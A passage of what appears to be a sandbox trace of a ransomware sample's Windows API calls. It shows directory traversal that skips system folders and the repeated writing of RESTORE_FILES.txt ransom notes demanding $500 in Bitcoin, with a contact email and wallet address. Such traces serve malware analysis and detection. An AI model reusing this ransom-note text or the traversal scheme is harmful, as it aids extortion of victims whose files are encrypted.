(in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.435] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.435] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\RESTORE_FILES.txt") returned 127 [0087.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\spn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.435] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.436] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.436] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.436] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.436] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.436] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.437] CloseHandle (hObject=0x154) returned 1 [0087.437] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="Windows") returned -1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="Program Files") returned 1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="Program Files (x86)") returned 1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="$Recycle.bin") returned 1 [0087.437] lstrcmpiW (lpString1="swd", lpString2="System Volume Information") returned -1 [0087.437] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd") returned 109 [0087.437] lstrcmpW (lpString1="swd", lpString2=".") returned 1 [0087.437] lstrcmpW (lpString1="swd", lpString2="..") returned 1 [0087.437] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*") returned 111 [0087.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0087.437] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0087.437] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0087.437] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0087.437] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0087.437] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0087.437] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\.") returned 111 [0087.438] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.438] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0087.438] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0087.438] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0087.438] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0087.438] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0087.438] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0087.438] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\..") returned 112 [0087.438] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.438] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.438] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0087.438] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0087.438] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\RESTORE_FILES.txt") returned 127 [0087.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\swd\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\swd\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0087.439] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.439] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0087.441] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.441] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.441] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.441] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0087.441] CloseHandle (hObject=0x154) returned 1 [0087.441] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0087.441] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0087.441] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RESTORE_FILES.txt") returned 123 [0087.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\adobe custom dictionary\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0087.442] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.442] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0087.443] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.443] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0087.444] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.444] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0087.444] CloseHandle (hObject=0x150) returned 1 [0087.444] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0087.444] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0087.444] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\RESTORE_FILES.txt") returned 99 [0087.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\dictionaries\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0087.445] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.445] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0087.446] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.446] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0087.446] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.446] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0087.446] CloseHandle (hObject=0x14c) returned 1 [0087.448] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0087.448] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0087.448] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\RESTORE_FILES.txt") returned 86 [0087.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\linguistics\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0087.449] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.449] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0087.450] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0087.450] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0087.450] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0087.450] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0087.450] CloseHandle (hObject=0xd8) returned 1 [0087.451] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0087.451] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0087.451] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\RESTORE_FILES.txt") returned 74 [0087.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0087.453] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0087.453] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0087.454] lstrlenA 